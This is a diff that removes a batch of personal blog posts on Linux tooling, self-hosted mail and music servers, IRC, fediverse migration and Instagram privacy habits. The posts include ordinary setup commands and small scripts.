ton. - For those curious, here's what it looks like running: - - now playing status polybar - -Update latest post on the index page - - This pertains to this very blog that you're reading. I wanted a quick - way to update the "latest post" section in the home page and the - [3]blog listing, with a link to the latest post. This would require - editing the Markdown [4]source of both pages. - - This was a very interesting challenge to me, primarily because it - requires in-place editing of the file, not just appending. Sure, I - could've come up with some sed one-liner, but that didn't seem very - fun. Also I hate regexes. Did a lot of research (read: Googling) on - in-place editing of files in Python, sorting lists of files by - modification time etc. and this is what I ended up on, ultimately: -#!/usr/bin/env python3 - -from markdown2 import markdown_path -import os -import fileinput -import sys - -# change our cwd -os.chdir("bin") - -blog = "../pages/blog/" - -# get the most recently created file -def getrecent(path): - files = [path + f for f in os.listdir(blog) if f not in ["_index.md", "feed. -xml"]] - files.sort(key=os.path.getmtime, reverse=True) - return files[0] - -# adding an entry to the markdown table -def update_index(s): - path = "../pages/_index.md" - with open(path, "r") as f: - md = f.readlines() - ruler = md.index("| -- | --: |\n") - md[ruler + 1] = s + "\n" - - with open(path, "w") as f: - f.writelines(md) - -# editing the md source in-place -def update_blog(s): - path = "../pages/blog/_index.md" - s = s + "\n" - for l in fileinput.FileInput(path, inplace=1): - if "--:" in l: - l = l.replace(l, l + s) - print(l, end=""), - - -# fetch title and date -meta = markdown_path(getrecent(blog), extras=["metadata"]).metadata -fname = os.path.basename(os.path.splitext(getrecent(blog))[0]) -url = "/blog/" + fname -line = f"| [{meta['title']}]({url}) | `{meta['date']}` |" - -update_index(line) -update_blog(line) - - I'm going to skip explaining this one out, but in essence, it's one - massive hack. And in the end, that's my point exactly. It's very hacky, - but the sheer amount I learnt by writing this ~50 line script can't be - taught anywhere. - - This was partially how [5]vite was born. It was originally intended to - be a script to build my site, but grew into a full-blown Python - package. I could've just used an off-the-shelf static site generator - given that there are [6]so many of them, but I chose to write one - myself. - - And that just about sums up what I wanted to say. The best and most fun - way to learn to code -- write hacky scripts. You heard it here. - -References - - 1. https://developer.spotify.com/documentation/web-api/ - 2. https://stedolan.github.io/jq/ - 3. https://icyphox.sh/blog - 4. https://github.com/icyphox/site/tree/master/pages - 5. https://github.com/icyphox/vite - 6. https://staticgen.com/
@@ -1,120 +0,0 @@
- 02 December, 2019 - -Instagram OPSEC - -Operational security for the average zoomer - - Which I am not, of course. But seeing as most of my peers are, I am - compelled to write this post. Using a social platform like Instagram - automatically implies that the user understands (to some level) that - their personally identifiable information is exposed publicly, and they - sign up for the service understanding this risk -- or I think they do, - anyway. But that's about it, they go ham after that. Sharing every - nitty gritty detail of their private lives without understanding the - potential risks of doing so. - - The fundamentals of OPSEC dictacte that you develop a threat model, and - Instgrammers are obviously incapable of doing that -- so I'll do it for - them. - -Your average Instagrammer's threat model - - I stress on the word "average", as in this doesn't apply to those with - more than a couple thousand followers. Those type of accounts - inherently face different kinds of threats -- those that come with - having a celebrity status, and are not in scope of this analysis. - * State actors: This doesn't really fit into our threat model, since - our target demographic is simply not important enough. That said, - there are select groups of individuals that operate on - Instagram^[1]1, and they can potentially be targetted by a state - actor. - - * OSINT: This is probably the biggest threat vector, simply because - of the amount of visual information shared on the platform. A lot - can be gleaned from one simple picture in a nondescript alleyway. - We'll get into this in the DOs and DON'Ts in a bit. - * Facebook & LE: Instagram is the last place you want to be doing an - illegal, because well, it's logged and more importantly -- not - end-to-end encrypted. Law enforcement can subpoena any and all - account information. Quoting Instagram's [2]page on this: - - a search warrant issued under the procedures described in the - Federal Rules of Criminal Procedure or equivalent state warrant - procedures upon a showing of probable cause is required to compel - the disclosure of the stored contents of any account, which may - include messages, photos, comments, and location information. - - That out of the way, here's a list of DOs and DON'Ts to keep in mind - while posting on Instagram. - -DON'Ts - - * Use Instagram for planning and orchestrating illegal shit! I've - explained why this is a terrible idea above. Use secure comms -- - even WhatsApp is a better choice, if you have nothing else. In - fact, try avoiding IG DMs altogether, use alternatives that - implement E2EE. - * Film live videos outside. Or try not to, if you can. You might - unknowingly include information about your location: street signs, - shops etc. These can be used to ascertain your current location. - * Film live videos in places you visit often. This compromises your - security at places you're bound to be at. - * Share your flight ticket in your story! I can't stress this - enough!!! Summer/winter break? "Look guys, I'm going home! Here's - where I live, and here's my flight number -- feel free to track - me!". This scenario is especially worrisome because the start and - end points are known to the threat actor, and your arrival time can - be trivially looked up -- thanks to the flight number on your - ticket. So, just don't. - * Post screenshots with OS specific details. This might border on - pendantic, but better safe than sorry. Your phone's statusbar and - navbar are better cropped out of pictures. They reveal the time, - notifications (apps that you use), and can be used to identify your - phone's operating system. Besides, the status/nav bar isn't very - useful to your screenshot anyway. - * Share your voice. In general, reduce your footprint on the platform - that can be used to identify you elsewhere. - * Think you're safe if your account is set to private. It doesn't - take much to get someone who follows you, to show show your profile - on their device. - -DOs - - * Post pictures that pertain to a specific location, once you've - moved out of the location. Also applies to stories. It can wait. - * Post pictures that have been shot indoors. Or try to; reasons - above. Who woulda thunk I'd advocate bathroom selfies? - * Delete old posts that are irrelevant to your current audience. Your - friends at work don't need to know about where you went to high - school. - - More DON'Ts than DOs, that's very telling. Here are a few more points - that are good OPSEC practices in general: - * Think before you share. Does it conform to the rules mentioned - above? - * Compartmentalize. Separate as much as you can from what you share - online, from what you do IRL. Limit information exposure. - * Assess your risks: Do this often. People change, your environments - change, and consequentially the risks do too. - -Fin - - Instagram is -- much to my dismay---far too popular for it to die any - time soon. There are plenty of good reasons to stop using the platform - altogether (hint: Facebook), but that's a discussion for another day. - - Or be like me: - - 0 posts lul - - And that pretty much wraps it up, with a neat little bow. - __________________________________________________________________ - - 1. [3]https://darknetdiaries.com/episode/51/ -- Jack talks about - Indian hackers who operate on Instagram. - -References - - 1. https://icyphox.sh/home/icy/leet/site/build/blog/ig-opsec/temp.html#fn:ddepisode - 2. https://help.instagram.com/494561080557017 - 3. https://darknetdiaries.com/episode/51/
@@ -1,43 +0,0 @@
- 28 October, 2019 - -The intelligence conundrum - -To protect an asset, or to protect the people? - - I watched the latest [1]S.W.A.T.) episode a couple of days ago, and it - highlighted some interesting issues that intelligence organizations - face when working with law enforcement. Side note: it's a pretty good - show if you like police procedurals. - -The problem - - Consider the following scenario: - * There's a local drug lord who's been recruited to provide intel, by - a certain 3-letter organization. - * Local PD busts his operation and proceed to arrest him. - * 3-letter org steps in, wants him released. - - So here's the thing, his presence is a threat to public but at the same - time, he can be a valuable long term asset -- giving info on drug - inflow, exchanges and perhaps even actionable intel on bigger fish who - exist on top of the ladder. But he also seeks security. The 3-letter - org must provide him with protection, in case he's blown. And like in - our case, they'd have to step in if he gets arrested. - - Herein lies the problem. How far should an intelligence organization go - to protect an asset? Who matters more, the people they've sworn to - protect, or the asset? Because afterall, in the bigger picture, local - PD and intel orgs are on the same side. - - Thus, the question arises -- how can we measure the "usefulness" of an - asset to better quantify the tradeoff that is to be made? Is the intel - gained worth the loss of public safety? This question remains largely - unanswered, and is quite the predicament should you find yourself in - it. - - This was a fairly short post, but an interesting problem to ponder - nonetheless. - -References - - 1. https://en.wikipedia.org/wiki/S.W.A.T._(2017_TV_series
@@ -1,99 +0,0 @@
- 03 November, 2019 - -IRC for DMs - -Honestly, it's pretty great - - [1]Nerdy and I decided to try and use IRC for our daily communications, - as opposed to non-free alternatives like WhatsApp or Telegram. This is - an account of how that went. - -The status quo of instant messaging apps - - I've tried a ton of messaging applications -- Signal, WhatsApp, - Telegram, Wire, Jami (Ring), Matrix, Slack, Discord and more recently, - DeltaChat. - - Signal: It straight up sucks on Android. Not to mention the centralized - architecture, and OWS's refusal to federate. - - WhatsApp: Facebook's spyware that people use without a second thought. - The sole reason I have it installed is for University's class groups; I - can't wait to graduate. - - Telegram: Centralized architecture and a closed-source server. It's got - a very nice Android client, though. - - Jami: Distributed platform, free software. I am not going to comment on - this because I don't recall what my experience was like, but I'm not - using it now... so if that's indicative of anything. - - Matrix (Riot): Distributed network. Multiple client implementations. - Overall, pretty great, but it's slow. I've had messages not send / not - received a lot of times. Matrix + Riot excels in group communication, - but really sucks for one-to-one chats. - - Slack / Discord: sigh - - DeltaChat: Pretty interesting idea -- on paper. Using existing email - infrastructure for IM sounds great, but it isn't all that cash in - practice. Email isn't instant, there's always a delay of give or take 5 - to 10 seconds, if not more. This affects the flow of conversation. I - might write a small blog post later, revewing DeltaChat.^[2]1 - -Why IRC? - - It's free, in all senses of the word. A lot of others have done a great - job of answering this question in further detail, this is by far my - favourite: - - [3]https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html - -Using IRC's private messages - - This was the next obvious choice, but personal message buffers don't - persist in ZNC and it's very annoying to have to do a /query - nerdypepper (Weechat) or to search and message a user via Revolution - IRC. The only unexplored option -- using a channel. - -Setting up a channel for DMs - - A fairly easy process: - * Set modes (on Rizon)^[4]2: -#crimson [+ilnpstz 3] - - In essence, this limits the users to 3 (one bot), sets the channel - to invite only, hides the channel from /whois and /list, and a few - other misc. modes. - * Notifications: Also a trivial task; a quick modification to - [5]lnotify.py to send a notification for all messages in the - specified buffer (#crimson) did the trick for Weechat. Revolution - IRC, on the other hand, has an option to setup rules for - notifications -- super convenient. - * A bot: Lastly, a bot for a few small tasks -- fetching URL titles, - responding to .np (now playing) etc. Writing an IRC bot is dead - simple, and it took me about an hour or two to get most of the - basic functionality in place. The source is [6]here. It is by no - means "good code"; it breaks spectacularly from time to time. - -In conclusion - - As the subtitle suggests, using IRC has been great. It's probably not - for everyone though, but it fits my (and Nerdy's) usecase perfectly. - - P.S.: I'm not sure why the footnotes are reversed. - __________________________________________________________________ - - 1. It's in [7]queue. - 2. Channel modes on [8]Rizon. - -References - - 1. https://nerdypepper.me/ - 2. https://icyphox.sh/home/icy/leet/site/build/blog/irc-for-dms/temp.html#fn:deltachat - 3. https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html - 4. https://icyphox.sh/home/icy/leet/site/build/blog/irc-for-dms/temp.html#fn:modes - 5. https://weechat.org/scripts/source/lnotify.py.html/ - 6. https://github.com/icyphox/detotated - 7. https://github.com/icyphox/site/issues/10 - 8. https://wiki.rizon.net/index.php?title=Channel_Modes
@@ -1,134 +0,0 @@
- 03 April, 2020 - -The Zen of KISS Linux - -My thoughts on the distro, the philosophy and my experience in general - - [1]I installed KISS early in January on my main machine -- an HP Envy - 13 (2017), and I have since noticed a lot of changes in my workflow, my - approach to software (and its development), and in life as a whole. I - wouldn't call KISS "life changing", as that would be overly dramatic, - but it has definitely reshaped my outlook towards technology -- for - better or worse. - - When I talk about KISS to people -- online or IRL---I get some pretty - interesting reactions and comments.^[2]1 Ranging from "Oh cool." to - "You must be retarded.", I've heard it all. A classic and a personal - favourite of mine, "I don't use meme distros because I actually get - work done." It is actually, quite the opposite -- I've been so much - more productive using KISS than any other operating system. I'll - explain why shortly. - - The beauty of this "distro", is it isn't much of a distribution at all. - There is no big team, no mailing lists, no infrastructure. The entire - setup is so loose, and this makes it very convenient to swap things out - for alternatives. The main (and potentially community) repos all reside - locally on your system. In the event that Dylan decides to call it - quits and switches to Windows, we can simply just bump versions - ourselves, locally! The [3]KISS Guidestones document is a good read. - - In the subseqent paragraphs, I've laid out the different things about - KISS that stand out to me, and make using the system a lot more - enjoyable. - -the package system - - Packaging for KISS has been delightful, to say the least. It takes me - about 2 mins to write and publish a new package. Here's the radare2 - package, which I maintain, for example. - - The build file (executable): -#!/bin/sh -e - -./configure \ - --prefix=/usr - -make -make DESTDIR="$1" install - - The version file: -4.3.1 1 - - The checksums file (generated using kiss checksum radare2): -4abcb9c9dff24eab44d64d392e115ae774ab1ad90d04f2c983d96d7d7f9476aa 4.3.1.tar.gz - - And finally, the sources file: -https://github.com/radareorg/radare2/archive/4.3.1.tar.gz - - This is literally the bare minimum that you need to define a package. - There's also the depends file where you specify the dependencies for - your package. kiss also generates a manifests file to track all the - files and directories that your package creates during installation, - for their removal, if and when that occurs. Now compare this process - with any other distribution's. - -the community - - As far as I know, it mostly consists of the #kisslinux channel on - Freenode and the [4]r/kisslinux subreddit. It's not that big, but it's - suprisingly active, and super helpful. There have been some interested - new KISS-related projects too: [5]kiss-games -- a repository for, well, - Linux games; [6]kiss-ppc64le and [7]kiss-aarch64 -- KISS Linux ports - for PowerPC and ARM64 architectures; [8]wyvertux -- an attempt at a - GNU-free Linux distribution, using KISS as a base; and tons more. - -the philosophy - - Software today is far too complex. And its complexity is only growing. - Some might argue that this is inevitable, and it is in fact progress. I - disagree. Blindly adding layers and layers of abstraction (Docker, - modern web "apps") isn't progress. Look at the Linux desktop ecosystem - today, for example -- monstrosities like GNOME and KDE are a result of - this...new wave software engineering. - - I see KISS as a symbol of defiance against this malformed notion. You - don't need all the bloat these DEs ship with to have a usable system. - Agreed, it's a bit more effort to get up and running, but it is - entirely worth it. Think of it as a clean table -- feels good to sit - down and work on, doesn't it? - - Let's take my own experience, for example. One of the initial few - software I used to install on a new system was dunst -- a notification - daemon. Unfortunately, it depends on D-Bus, which is Poetterware; ergo, - not on KISS. However, using a system without notifications has been - very pleasant. Nothing to distract you while you're in the zone. - - Another instance, again involving D-Bus (or not), is Bluetooth audio. - As it happens, my laptop's 3.5mm jack is rekt, and I need to use - Bluetooth for audio, if at all. Sadly, Bluetooth audio on Linux - hard-depends on D-Bus. Bluetooth stacks that don't rely on D-Bus do - exist, like on Android, but porting them over to desktop is - non-trivial. However, I used this to my advantage and decided not to - consume media on my laptop. This has drastically boosted my - productivity, since I literally cannot watch YouTube even if I wanted - to. My laptop is now strictly work-only. If I do need to watch the - occasional video / listen to music, I use my phone. Compartmentalizing - work and play to separate devices has worked out pretty well for me. - - I'm slowly noticing myself favor low-tech (or no-tech) solutions to - simple problems too. Like notetaking -- I've tried plaintext files, Vim - Wiki, Markdown, but nothing beats actually using pen and paper. Tech, - from what I can see, doesn't solve problems very effectively. In some - cases, it only causes more of them. I might write another post - discussing my thoughts on this in further detail. - - I'm not sure what I intended this post to be, but I'm pretty happy with - the mindspill. To conclude this already long monologue, let me clarify - one little thing y'all are probably thinking, "Okay man, are you - suggesting that we regress to the Dark Ages?". No, I'm not suggesting - that we regress, but rather, progress mindfully. - __________________________________________________________________ - - 1. No, I don't go "I use KISS btw". I don't bring it up unless - provoked. - -References - - 1. https://icyphox.sh/blog/five-days-tty - 2. https://icyphox.sh/home/icy/leet/site/build/blog/kiss-zen/temp.html#fn:bringing-up-kiss - 3. https://k1ss.org/guidestones - 4. https://old.reddit.com/r/kisslinux - 5. https://github.com/sdsddsd1/kiss-games - 6. https://github.com/jedavies-dev/kiss-ppc64le - 7. https://github.com/jedavies-dev/kiss-aarch64 - 8. https://github.com/wyvertux/wyvertux
@@ -1,69 +0,0 @@
- 29 March, 2020 - -Introducing mael - -An experimental mail client - - Update: The code lives here: [1]https://github.com/icyphox/mael - - I've been on the lookout for a good terminal-based email client since - forever, and I've tried almost all of them. The one I use right now - sucks a little less -- [2]aerc. I have some gripes with it though, like - the problem with outgoing emails not getting copied to the Sent folder, - and instead erroring out with a cryptic EOF -- that's literally all it - says. I've tried mutt, but I find it a little excessive. It feels like - the weechat of email -- to many features that you'll probably never - use. - - I need something clean and simple, less bloated (for the lack of a - better term). This is what motivated me to try writing my own. The - result of this (and not to mention, being holed up at home with nothing - better to do), is mael.^[3]1 - - mael isn't like your usual TUI clients. I envision this to turn out - similar to mailx -- a prompt-based UI. The reason behind this UX - decision is simple: it's easier for me to write. :) - - Speaking of writing it, it's being written in a mix of Python and bash. - Why? Because Python's email and mailbox modules are fantastic, and I - don't think I want to parse Maildirs in bash. "But why not pure - Python?" Well, I'm going to be shelling out a lot (more on this in a - bit), and writing interactive UIs in bash is a lot more intuitive, - thanks to some of the nifty features that later versions of bash have - -- read, mapfile etc. - - The reason I'm shelling out is because two key components to this - client, that I haven't yet talked about -- mbsync and msmtp are in use, - for IMAP and SMTP respectively. And mbsync uses the Maildir format, - which is why I'm relying on Python's mailbox package. Why is this in - the standard library anyway?! - - The architecture of the client is pretty interesting (and possibly very - stupid), but here's what happens: - * UI and prompt stuff in bash - * emails are read using less - * email templates (RFC 2822) are parsed and generated in Python - * this is sent to bash in STDOUT, like - -msg="$(./mael-parser "$maildir_message_path")" - - These kind of one-way (bash -> Python) calls are what drive the entire - process. I'm not sure what to think of it. Perhaps I might just give up - and write the entire thing in Python. Or...I might just scrap this - entirely and just shut up and use aerc. I don't know yet. The code does - seem to be growing in size rapidly. It's about ~350 LOC in two days of - writing (Python + bash). New problems arise every now and then and it's - pretty hard to keep track of all of this. It'll be cool when it's all - done though (I think). - - If only things just worked. - __________________________________________________________________ - - 1. I have yet to open source it; this post will be updated with a link - to it when I do. - -References - - 1. https://github.com/icyphox/mael - 2. https://git.sr.ht/~sircmpwn/aerc - 3. https://icyphox.sh/home/icy/leet/site/build/blog/mael/temp.html#fn:oss
@@ -1,162 +0,0 @@
- 15 August, 2019 - -Setting up my personal mailserver - -This is probably a terrible idea... - - A mailserver was a long time coming. I'd made an attempt at setting one - up around ~4 years ago (ish), and IIRC, I quit when it came to DNS. And - I almost did this time too.^[1]1 - - For this attempt, I wanted a simpler approach. I recall how terribly - confusing Dovecot & Postfix were to configure and hence I decided to - look for a containerized solution, that most importantly, runs on my - cheap $5 Digital Ocean VPS -- 1 vCPU and 1 GB memory. Of which only - around 500 MB is actually available. So yeah, pretty tight. - -What's available - - Turns out, there are quite a few of these OOTB, ready to deply - solutions. These are the ones I came across: - * [2]poste.io: Based on an "open core" model. The base install is - open source and free (as in beer), but you'll have to pay for the - extra stuff. - * [3]mailu.io: Free software. Draws inspiration from poste.io, but - ships with a web UI that I didn't need. - * [4]mailcow.email: These fancy domains are getting ridiculous. But - more importantly they need 2 GiB of RAM plus swap?! Nope. - * [5]Mail-in-a-Box: Unlike the ones above, not a Docker-based - solution but definitely worth a mention. It however, needs a fresh - box to work with. A box with absolutely nothing else on it. I can't - afford to do that. - * [6]docker-mailserver: The winner. - -So... docker-mailserver - - The first thing that caught my eye in the README: - - Recommended: - * 1 CPU - * 1GB RAM - - Minimum: - * 1 CPU - * 512MB RAM - - Fantastic, I can somehow squeeze this into my existing VPS. Setup was - fairly simple & the docs are pretty good. It employs a single .env file - for configuration, which is great. However, I did run into a couple of - hiccups here and there. - - One especially nasty one was docker / docker-compose running out of - memory. -Error response from daemon: cannot stop container: 2377e5c0b456: Cannot kill con -tainer 2377e5c0b456226ecaa66a5ac18071fc5885b8a9912feeefb07593638b9a40d1: OCI run -time state failed: runc did not terminate sucessfully: fatal error: runtime: out - of memory - - But it eventually worked after a couple of attempts. - - The next thing I struggled with -- DNS. Specifically, the with the step - where the DKIM keys are generated^[7]2. The output under - config/opendkim/keys/domain.tld/mail.txt - isn't exactly CloudFlare friendly; they can't be directly copy-pasted - into a TXT record. - - This is what it looks like. -mail._domainkey IN TXT ( "v=DKIM1; h=sha256; k=rsa; " - "p=<key>" - "<more key>" ) ; -- -- DKIM key mail for icyphox.sh - - But while configuring the record, you set "Type" to TXT, "Name" to - mail._domainkey, and the "Value" to what's inside the parenthesis ( ), - removing the quotes "". Also remove the part that appears to be a - comment ; -- -- .... - - To simplify debugging DNS issues later, it's probably a good idea to - point to your mailserver using a subdomain like mail.domain.tld using - an A record. You'll then have to set an MX record with the "Name" as @ - (or whatever your DNS provider uses to denote the root domain) and the - "Value" to mail.domain.tld. And finally, the PTR (pointer record, I - think), which is the reverse of your A record -- "Name" as the server - IP and "Value" as mail.domain.tld. I learnt this part the hard way, - when my outgoing email kept getting rejected by Tutanota's servers. - - Yet another hurdle -- SSL/TLS certificates. This isn't very properly - documented, unless you read through the [8]wiki and look at an example. - In short, install certbot, have port 80 free, and run -$ certbot certonly --standalone -d mail.domain.tld - - Once that's done, edit the docker-compose.yml file to mount - /etc/letsencrypt in the container, something like so: -... - -volumes: - - maildata:/var/mail - - mailstate:/var/mail-state - - ./config/:/tmp/docker-mailserver/ - - /etc/letsencrypt:/etc/letsencrypt - -... - - With this done, you shouldn't have mail clients complaining about wonky - certs for which you'll have to add an exception manually. - -Why would you...? - - There are a few good reasons for this: - -Privacy - - No really, this is the best choice for truly private email. Not - ProtonMail, not Tutanota. Sure, they claim so and I don't dispute it. - Quoting Drew Devault^[9]3, - - Truly secure systems do not require you to trust the service - provider. - - But you have to trust ProtonMail. They run open source software, but - how can you really be sure that it isn't a backdoored version of it? - - When you host your own mailserver, you truly own your email without - having to rely on any third-party. This isn't an attempt to spread FUD. - In the end, it all depends on your threat model(TM). - -Decentralization - - Email today is basically run by Google. Gmail has over 1.2 billion - active users. That's obscene. Email was designed to be decentralized - but big corps swooped in and made it a product. They now control your - data, and it isn't unknown that Google reads your mail. This again - loops back to my previous point, privacy. Decentralization guarantees - privacy. When you control your mail, you subsequently control who reads - it. - -Personalization - - Can't ignore this one. It's cool to have a custom email address to - flex. - - x@icyphox.sh vs gabe.newell4321@gmail.com - - Pfft, this is no competition. - __________________________________________________________________ - - 1. My [10]tweet of frustration. - 2. [11]Link to step in the docs. - 3. From his [12]article on why he doesn't trust Signal. - -References - - 1. https://icyphox.sh/home/icy/leet/site/build/blog/mailserver/temp.html#fn:1 - 2. https://poste.io/ - 3. https://mailu.io/ - 4. https://mailcow.email/ - 5. https://mailinabox.email/ - 6. https://github.com/tomav/docker-mailserver/ - 7. https://icyphox.sh/home/icy/leet/site/build/blog/mailserver/temp.html#fn:2 - 8. https://github.com/tomav/docker-mailserver/wiki/Installation-Examples - 9. https://icyphox.sh/home/icy/leet/site/build/blog/mailserver/temp.html#fn:3 - 10. https://twitter.com/icyphox/status/1161648321548566528 - 11. https://github.com/tomav/docker-mailserver#generate-dkim-keys - 12. https://drewdevault.com/2018/08/08/Signal.html
@@ -1,53 +0,0 @@
- 05 May, 2020 - -Stop joining mastodon.social - -Do you even understand federation? - - No, really. Do you actually understand why the Mastodon network exists, - and what it stands for, or are you just LARPing? If you're going to - just cross-post from Twitter, why are you even on Mastodon? - - Okay, so Mastodon is a "federated network". What does that mean? You - have a bunch of instances, each having their own userbase, and each - instance federates with other instances, forming a distributed network. - Got that? Cool. Now let's get to the problem with mastodon.social. - - mastodon.social is the instance run by the lead developer. Why does - everybody flock to it? I'm really not sure, but if I were to hazard a - guess, I'd say it's because people don't really understand federation. - "Oh, big instance? I should probably join that." Herd mentality? I - dunno. - - And what happens when every damn user joins just one instance? It - becomes more Twitter, that's what. The federation is gone. Nearly all - activity is generated from just one instance. Here are some numbers: - * Total number of users on Mastodon: ~2.2 million. - * Number of users on mastodon.social: 529923 - - Surprisingly, there's an instance even bigger than mastodon.social -- - pawoo.net. I have no idea why it's so big and it's primarily Japanese. - Its user count is over 620k. So mastodon.social and pawoo.net put - together form over 1 million users, that's more than 50% of the entire - Mastodon populace. That's nuts.^[1]1 - - And you're only enabling this centralization by joining - mastodon.social! Really, what even is there on mastodon.social? Have - you even seen its local timeline? Probably not. Join an instance with - more flavor. Are you into, say, the BSDs? Join bsd.network. Free - software? fosstodon.org. Or host your own for yourself and your - friends. - - If you really do care about decentralization and freedom, and aren't - just memeing to look cool on Twitter, then move your account to another - instance.^[2]2 - __________________________________________________________________ - - 1. [3]https://rosenzweig.io/blog/the-federation-fallacy.html - 2. Go to /settings/migration from your instance's web page. - -References - - 1. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-social/temp.html#fn:federation-fallacy - 2. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-social/temp.html#fn:move-account - 3. https://rosenzweig.io/blog/the-federation-fallacy.html
@@ -1,73 +0,0 @@
- 04 September, 2020 - -Migrating from Mastodon to Pleroma - -Mastodon bad. Pleroma good. - - If you've been following me on the fediverse, you would've witnessed my - numerous (failed) attempts at migrating from Mastodon to Pleroma, - running on my Raspberry Pi. I finally got it working, and these are the - steps I took. It's sort of a loose guide you could follow, but I can't - promise it'll work for you. - - The Erlang and Elixir packages are pretty broken and outdated on - Raspbian. So this time, I built them from source.^[1]1^[2]2 I also - assume you have Mastodon and Pleroma (source, not OTP) installed -- - probably at /home/mastodon/live and /opt/pleroma, respectively. - - Once you have Erlang and Elixir compiled and sitting in your PATH, pull - [3]soapbox-pub/migrator. Now read the readme and the do_migration.sh - script to get an idea of what you're getting into. - - Move into the cloned directory and create a .env: -MASTODON_PATH=/home/mastodon/live -PLEROMA_PATH=/opt/pleroma - - Then, run: -$ yarn # install deps -$ cp -r mastodon/* /home/mastodon/live -$ cp -r pleroma/* /opt/pleroma -$ RAILS_ENV=production yarn masto export - - If you run into any permissions issues, chown and proceed. This should - export all your Mastodon activity into /home/mastodon/live/migrator. - Now, copy the migrator directory into your Pleroma installation path. -$ cp -r migrator /opt/pleroma - - You can then import all of it into Pleroma (possibly prefixed with sudo - -Hu pleroma): -$ MIX_ENV=prod mix migrator.import - - If all went well, you would've successfully migrated from Mastodon to - Pleroma. If not, well feel free to send me an email (or @ me on the - fedi). I suppose you could also reach [4]Alex -- he's the incredibly - based guy who wrote the migrator, [5]soapbox-fe and does some Elixir - magic he keeps [6]posting about. - - Rest assured, the migrator has a 100% success rate -- Alex and I are - apparently the only two who have it working. ^2/[2]. - -why should you migrate? - - Because Pleroma is cleaner, leaner^[7]3 and prettier looking^[8]4. Oh, - and we have chats. screenshot of pleroma + soapbox-fe - __________________________________________________________________ - - 1. [9]Erlang install guide - 2. [10]Elixir install guide - 3. Mastodon used about ~2.5 GB out of the 4 I have on my Pi. With - Pleroma, the total used RAM is only about ~700 MB. That's crazy! - 4. ...with Soapbox. :^) - -References - - 1. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-to-pleroma/temp.html#fn:1 - 2. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-to-pleroma/temp.html#fn:2 - 3. https://gitlab.com/soapbox-pub/migrator - 4. https://alexgleason.me/ - 5. https://soapbox.pub/ - 6. https://gleasonator.com/@alex - 7. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-to-pleroma/temp.html#fn:3 - 8. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-to-pleroma/temp.html#fn:4 - 9. http://erlang.org/doc/installation_guide/INSTALL.html - 10. https://elixir-lang.org/install.html#compiling-from-source-unix-and-mingw
@@ -1,65 +0,0 @@
- 16 January, 2020 - -Vimb: my Firefox replacement - -Web browsing, suckless style - - After having recently installed [1]KISS, and building Firefox from - source, I was exposed to the true monstrosity that Firefox -- and web - browsers in general---is. It took all of 9 hours to build the - dependencies and then Firefox itself. - - Sure, KISS now ships Firefox binaries in the [2]firefox-bin package; I - decided to get rid of that slow mess anyway. - -Enter vimb - - [3]vimb is a browser based on [4]webkit2gtk, with a Vim-like interface. - webkit2gtk builds in less than a minute -- it blows Firefox out of the - water, on that front. - - There isn't much of a UI to it -- if you've used Vimperator/Pentadactyl - (Firefox plugins), vimb should look familiar to you. It can be - configured via a config.h or a text based config file at - ~/.config/vimb/config. Each "tab" opens a new instance of vimb, in a - new window but this can get messy really fast if you have a lot of tabs - open. - -Enter tabbed - - [5]tabbed is a tool to embed X apps which support xembed into a tabbed - UI. This can be used in conjunction with vimb, like so: -tabbed vimb -e - - Where the -e flag is populated with the XID, by tabbed. Configuring - Firefox-esque keybinds in tabbed's config.h is relatively easy. Once - that's done -- voil! A fairly sane, Vim-like browsing experience - that's faster and has a smaller footprint than Firefox. - -Ad blocking - - Ad blocking support isn't built-in and there is no plugin system - available. There are two options for ad blocking: - 1. [6]wyebadblock - 2. /etc/hosts - -Caveats - - Some websites tend to not work because they detect vimb as an older - version of Safari (same web engine). This is a minor inconvenience, and - not a dealbreaker for me. I also cannot login to Google's services for - some reason, which is mildly annoying, but it's good in a way -- I am - now further incentivised to dispose of my Google account. - - And here's the screenshot y'all were waiting for: - - vimb - -References - - 1. https://getkiss.org/ - 2. https://github.com/kisslinux/repo/tree/master/extra/firefox-bin - 3. https://fanglingsu.github.io/vimb/ - 4. https://webkitgtk.org/ - 5. https://tools.suckless.org/tabbed/ - 6. https://github.com/jun7/wyebadblock
@@ -1,94 +0,0 @@
- 13 December, 2020 - -My music streaming setup - -Think Spotify, but self-hosted and not as good - - Having a self-hosted, centralized music streaming setup has been on my - todo list for the longest time. I'd initially tried using NFS, but - mounting it on my phone was very inconvenient. Incidentally, a few days - ago, the existence of Subsonic/*sonic became known to me. - -gonic - - I found [1]gonic to be the simplest of them all, and proceeded to set - it up on the RPi. There are other alternatives too, like [2]Navidrome, - which ships with a web player, or [3]Airsonic. gonic stood out the most - to me because it's effectively headless, barring a simple web interface - for configuration. - - Setting it up was trivial. I did run into an [4]issue -- I noticed that - only songs that were already in folders, sorted by album, were being - picked up in the scan. -|-- Void Of Vision - Hyperdaze (2019) -| |-- 01. Overture.mp3 -| |-- 02. Year of the Rat.mp3 -| |-- 03. Babylon.mp3 -| |-- 04. If Only.mp3 -| |-- 05. Slave to the Name.mp3 -| |-- 06. Adrenaline.mp3 -| |-- 07. Hole In Me.mp3 -| |-- 08. Kerosene Dream.mp3 -| |-- 09. Decay.mp3 -| |-- 10. Splinter.mp3 -| |-- 11. Hyperdaze.mp3 -|-- Volumes - Disaster Vehicle.mp3 -|-- Volumes - Finite.mp3 -|-- Volumes - Heavy Silence.mp3 -|-- Volumes - Hope.mp3 -|-- Volumes - Interlude.mp3 -... - - - So, in a directory tree like above, only the tracks inside "Void Of - Vision - Hyperdaze (2019)" would get picked up, and all the "Volumes" - songs wouldn't -- since it wasn't in a subfolder of its own. - - As a workaround -- and a necessary cleanup of my music -- I figured I'd - give [5]beets a shot. - -beets - - beets is extensively documented, so I'll skip the basics. In essence, - it's a music organization tool -- fetches tags, sorts your collection, - etc. Most of my music has been tagged already, so I skipped that. I - only it all to be grouped by album. A bit of digging in the docs, and I - found what I wanted: --group-albums. - - And in my config.yaml, I specified my desired path format like so: -... -paths: - default: $albumartist - $album%aunique{}/$track $title - - Finally, running: -$ beet import --noautotag --move --group-albums path/to/dirty/music - -$ tree 